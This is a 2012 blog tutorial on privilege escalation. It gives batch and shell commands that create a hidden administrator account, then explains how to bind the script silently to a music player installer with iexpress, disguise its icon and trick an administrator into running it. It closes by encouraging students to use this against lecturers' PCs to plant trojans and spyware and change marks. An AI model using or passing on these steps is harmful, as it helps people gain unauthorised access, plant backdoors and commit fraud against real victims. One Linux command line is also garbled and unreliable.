Monday, January 23, 2012

Privilege Escalation



As we discussed earlier enumeration only means identification of information that can be used to intrude system. And an attacker needs a weak user account to intrude system, it doesn't matter if that user account doesn't have administrative privileges or not because its job of hacker to grant himself/herself administrative privileges or add an account that will be having administrative privileges for him/her.
The process of making a normal user a super user is known as privilege escalation. An attacker by all means will try his/her best to become super user. He can manually make itself super user or can use tools for the reason, for now we will learn how he can set up things manually to escalate privileges. Be sure we will also cover tools that can be used for this but later not now.

Once an attacker is in he/she may get rights to use devices, files and folders in system. No matter he/she is not a super user he/she will have rights to use shared network folder and might even have rights to copy data in it. This is where the hacker will do his/her job of creating a user with administrative privileges or add himself/herself as user with administrative privileges.

For adding a user with administrative privileges open notepad and type following commands and save it as batch script( .bat extension),

@echo off
net user Nrupen 12345678 /add
net localgroup administrators Nrupen /add

the above script will add a user with name Nrupen with password 12345678 and assign it administrative privileges. For making an existing user a super user he/she will type following commands in batch script.

@echo off
net localgroup administrators user_name /add

The disadvantage of above script is that it appears on command prompt when executed so we have to hide them in some another program, here for demonstration I am using AIMP2 its a music player program, an attacker will use a program in which administrative user will be interested in. To combine programs we can use “iexpress.exe” wizard in windows, other tool that we are in need of is “Resource Hacker”. Open command prompt and type “iexpress.exe” in it.
Select “Create New Self Extraction Directive”.
Now select “Extract Files And Run Installation Command
Press next and type title of package, use name of program you want to bind your scripts with.
In confirmation prompt select “No Prompt” then press next and select “Do not display license”. Now add your script file and program file you want to bind.
Now from “install program” option select the program file you want to bind and in “post install command” select your batch script script or vise-versa. Please note that if you are adding batch script in this way you will have to add an extra line to script which will delete script after execution. So the final script that you will use will have following lines in it.

@echo off
net user Nrupen 12345678 /add
net localgroup administrators Nrupen /add
del new.bat
 Press next then select “default(recommended)” then “no message” select location and create bonded file.

When your file will be created you'll find its icon doesn't appear like the original program use resource hacker to change its icon. At present I am not covering how o use resource hacker so please check its help file to check out how to change icon using resource hacker. Now try to make some provision so that system administrator should execute this bonded file. The installation will begin without problem and your script will be executed in background.
Same batch script effect can also be achieved in UNIX or Linux systems by typing following commands in shell script.

useradd -G root Nrupen
echo 12345678 || passwd –stdin Nrupen

Above commands will create user Nrupen with password 12345678 and it will be the member of root group that means a super user. Your next step will be anyhow make any super user member execute the shell script with above code, because in Unix and Linux environment you don't have ready made programs that can help you out as in windows. Your knowledge of Unix and Linux platform should be sound enough to fool root group member to execute your script.

College students usually use windows privilege escalation trick to fool their lecturers and get administrative privileges of their lecturer's PC and that's how they become able to install Trojans and spy-wares in their PC's and alter their assignment marks. In next section to this we will have our look on tools that can be used for privilege escalation and then how to execute process remotely on victim PC. Till then if you have any questions, please don't hesitate to ask, thanks for reading and keep visiting.

No comments:

Post a Comment

LinkWithin

Related Posts Plugin for WordPress, Blogger...